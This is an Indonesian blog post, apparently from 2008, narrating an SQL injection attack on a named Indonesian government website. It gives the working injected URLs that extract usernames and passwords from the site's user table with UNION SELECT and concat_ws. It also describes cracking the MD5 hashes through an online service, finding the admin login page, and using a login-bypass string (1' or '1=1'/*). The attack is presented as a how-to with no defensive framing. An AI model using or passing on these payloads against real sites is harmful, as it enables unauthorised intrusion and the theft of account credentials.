Gunakan Mesin Pencari


Google





21 September 2008

SQL injection (lagi dan lagi) di situs pemerintah



Oleh tomahawk_underground
Published: September 9, 2008

langsung aja....saya masuk ke situs http://www.bkkbn.go.id, kemudia ke URL http://www.bkkbn.go.id/article.php?cid=27

up...yang paling gampang untuk memeriksa situs ini bisa diinjek atau tidak (tapi gk selamanya juga sih) ada lah dengan menghapus baris sebelah tanda = , kmudian diisi dengan tanda '.

jika ada pesan error, misalnya :
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in bla bla bla....

yaa tandanya calon2 isa diinject nih... (tapi gk selamanya bisa lhooo)

kemudian saya masukkin SQL injection seperti ini :

http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,3,4+FROM+user+--

arti dari : 1,2,3,4 ini = coba2 aja...diurutin tuh satu2 dari angka 1,2,3,4,....... sampe nongol field nya
arti dari : user = nama table (nebak...)

nah..nongol deh field nya :


ada di field 3...(gitu deh...). terus selanjutnya ganti angka 3 tadi ama inject nya...saya merubahnya jadi bgini :


http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,concat_ws(0x3a,user_name,user_password),4+FROM+user+--

angka 3 diganti jadi concat_ws(0x3a,user_name,user_password)
meminta username ama password (gitu deh...)



nah...password di enkrip kan tuh pake MD5, yaa tinggal di dekrip aja lah...yg gampang sih dekrip ke http://www.passcracking.com

udeh tuh dapet kan hasil dekrip nya...sekarang tinggal cari halaman admin loginnya . seperti biasa, rata-rata situs standart tuh menu adminnya terletak di folder admin, jadi bgini :

http://www.bkkbn.go.id/admin/index.php

naahh...masuk deh

selanjutnya tinggal masukin aja user ID ama password nya.

JREENGGG!!!! REBES!! masuk deh
ada yang sebagai administrator, ada yang sebagai penulis


sebenernya sih bisa juga masuk sebagai penulis pake inject

username : 1' or '1=1'/*
password : 1' or '1=1'/*

tapi hanya sebagai penulis, bukan administrator.

akhir kata saya mau mengucapkan terimakasih kepada :
# My Lord Allah SWT
# kampus tercinta IPB, khususnya jurusan teknik komputer, kan kuangkat nama kampus ku
# member jasakom, khususnya yg nongkrong di forum (pl4y312, pitaqh, aurel666, massmissile, kucing item, cruzen, t0m, sanca,mmm...siapa lagi yaa...byk bgt deh..maap yg gk kesebut, tapi luv u all )

special thanks to :
# Om PIRUS (makasih free email nya )
# th30nly (ngutang banyak ama lo nih ilmunya)
# JS member dgn ID "new-bee" (yg ikut kerjasama pas pagi-pagi, wekekeke...)
# Tique --> artikel ini special buat kamu, tanda permohonan maaf dari saya (daripada di deface, mending jadi artikel). sekalian buat membuktikan kalo saya bukan hacker, apalagi hacker autis.

salam

tomahawk[at]jasakom[dot]org

    << Homepage

Link Teman

- Blogger Indonesia -
- International Scholarship -
- Job Vacancy Indonesia -
- Info Lowongan Kerja -
- Beasiswa Indonesia Scholarship -
- Informasi Beasiswa Indonesia -
- Jedustech -
- Gambar Hantu -
- Kampung Halaman -
- Informasi Teknologi -
- Klik Promosi -
- Speechyourmind -
- Surat Kabar Online -
- Rismasari-dewi -
- Izal Teknik -
- Suhenx-suhenx -
- Manan Computer -
- Favorite Foot Ball -
- Gallery Photo -
- Empat Lawang-
- Macan Indonesia -
- Clydens -
- Exploe21 -
- Coretan Zian -
- Ancha-ary -
- Catatan Vicky -
- Blog Rijal -
- Griya Unik -
- Persahabatan -
- Pantun Puisi -
- Blog Dian -
- 27 Januari -
- Silemot Blog -
- Master Of Change -
- Chinupiyyan Blog -
- Informasi Dunia Olahraga -
- Frizzy Blog -
- Zeskya -
- Dokter Ceka -
- Nicholas Care -
- Realita Kehidupan -
- Techno Neo -
- Yor Answer see -
- 1001 World News -
- Chubby -
- Coretanku -
- Info Gaptek -
- Blog Teguh -
- Blog Elzenz -
- Bunda Azka -
- Blog Okta -




Pesan Sponsor



Sponsor Resmi




Ilkan Baris




Bisnis Online




Last Post

+ Random Number Generator
+ Teknik Blokir Semua File Executable Dan Script Di ...
+ Bisnis Online
+ MENGUNGKAP RAHASIA MENGHASILKAN JUTAAN RUPIAH DARI...
+ Membongkar File-file terproteksi
+ Tips: Menjebak Hacker
+ Trik Jitu Ampuh Menghadapi Billing Explorer yang m...
+ Problem phpCMS Setelah Migrasi Server di Master We...
+ Kartu SIM GSM Dapat di-Cloning
+ Cara Mengcrack Windows Vista Final Release

Shout Box


Free shoutbox @ ShoutMix




Free Blog Content



Sekilas Info

IP

Rank






Powered by  MyPagerank.Net




webcounter

Ari Afriawan's Profile
Ari Afriawan's Facebook Profile
Create your badge

Archives

+ Juli 2007
+ Agustus 2007
+ Februari 2008
+ September 2008
+ November 2008
+ Desember 2008
+ Januari 2009
+ Februari 2009
+ Maret 2009
+ April 2009
+ Juni 2009
+ Agustus 2009
+ Oktober 2009
+ November 2009
+ Mei 2010


Sponsor Resmi




Blog Teman


Informasi


Blog Tutorial
Blog Sharing
Blogger Indonesia
KampungBlog.com - Kumpulan Blog-Blog
Indonesia
100 Blog Indonesia Terbaik

Copy Code Berikut Ke Blog Anda


Arinov


Friends banner




Ari_Novita
Dunia Blogger
Segelas Air Putih
GADO-GADO

Photo Sharing and Video Hosting at Photobucket

Tukar Link
Image Hosted by ImageShack.us




Keep-My-Mind



Photobucket
SCIENTIFIC FASTING

Architectural Corner
Infokom 2008
www.sampara.com

Photobucket
hir
Photobucket
Free Template



Spirit of Going to Better Life -> Motivasi, soulful, renungan, hikmah, opportunity, bisnis, healthy & product
Tukar Link sevanusngeblog.blogspotcom
MiewzZ Blog
Blog Yos
Blogger